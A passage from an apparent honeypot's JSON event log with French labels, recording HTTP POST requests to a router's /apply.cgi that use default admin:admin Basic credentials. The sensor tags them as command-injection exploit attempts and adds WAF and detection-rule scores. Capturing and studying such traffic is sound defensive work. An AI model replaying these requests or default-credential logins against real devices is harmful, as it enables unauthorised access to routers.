\u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/apply.cgi\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/apply.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 5 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":527},{"id":11860745,"ip":"45.156.87.213","ts":"2026-07-14 08:22:32.000000","proto":"tcp","src_port":59682,"dst_port":81,"service":"http","classification":"cmd_injection","waf_score":34,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/apply.cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 5, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u002231402cc48ac7ac052e1d50fc94349665a12c2c45\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 511, \u0022payload_entropy\u0022: 5.371040212272598, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 12, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022c663587837d67542a087ce7094dc34ab8bb0d503\u0022, \u0022event_fingerprint\u0022: \u002256676a028215adbb9fe1a2810691321f4a0be942\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 142, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0463\u0022, \u0022pat-0146\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022Cred Basic auth spray\u0022, \u0022CRS 932205\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0463\u0022, \u0022pat-0146\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00224648318ffdb49a2d78884e7b97bac6a1\u0022, \u0022path_pattern_hash\u0022: \u0022b3e1dfd605a877958cebee595444f5d1\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 334\\r\\nConnection: close\\r\\n\\r\\nchange_action=\u0026submit_button=Basic\u0026action=\u0026commit=0\u0026wan_ip=10.0.0.1\u0026wan_mask=25\u0022, \u0022payload_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 334\\r\\nConnection: close\\r\\n\\r\\nchange_action=\u0026submit_button=Basic\u0026action=\u0026commit=0\u0026wan_ip=10.0.0.1\u0026wan_mask=25\u0022, \u0022payload_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022553d69611f032dd35a85ae7970500a44d5fa3c77\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/apply.cgi\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/apply.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 5 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":511},{"id":11860747,"ip":"45.156.87.213","ts":"2026-07-14 08:22:32.000000","proto":"tcp","src_port":59710,"dst_port":81,"service":"http","classification":"cmd_injection","waf_score":34,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/apply.cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 5, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u002231402cc48ac7ac052e1d50fc94349665a12c2c45\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 529, \u0022payload_entropy\u0022: 5.369271878134913, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 12, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022c663587837d67542a087ce7094dc34ab8bb0d503\u0022, \u0022event_fingerprint\u0022: \u002256676a028215adbb9fe1a2810691321f4a0be942\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 142, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0463\u0022, \u0022pat-0146\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022Cred Basic auth spray\u0022, \u0022CRS 932205\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0463\u0022, \u0022pat-0146\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u002240acb91e762b71a68c17375cfec36b46\u0022, \u0022path_pattern_hash\u0022: \u0022b3e1dfd605a877958cebee595444f5d1\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 352\\r\\nConnection: close\\r\\n\\r\\nsubmit_button=Diagnostics\u0026change_action=gozila_cgi\u0026submit_type=start_traceroute\u0022, \u0022payload_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 352\\r\\nConnection: close\\r\\n\\r\\nsubmit_button=Diagnostics\u0026change_action=gozila_cgi\u0026submit_type=start_traceroute\u0022, \u0022payload_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: 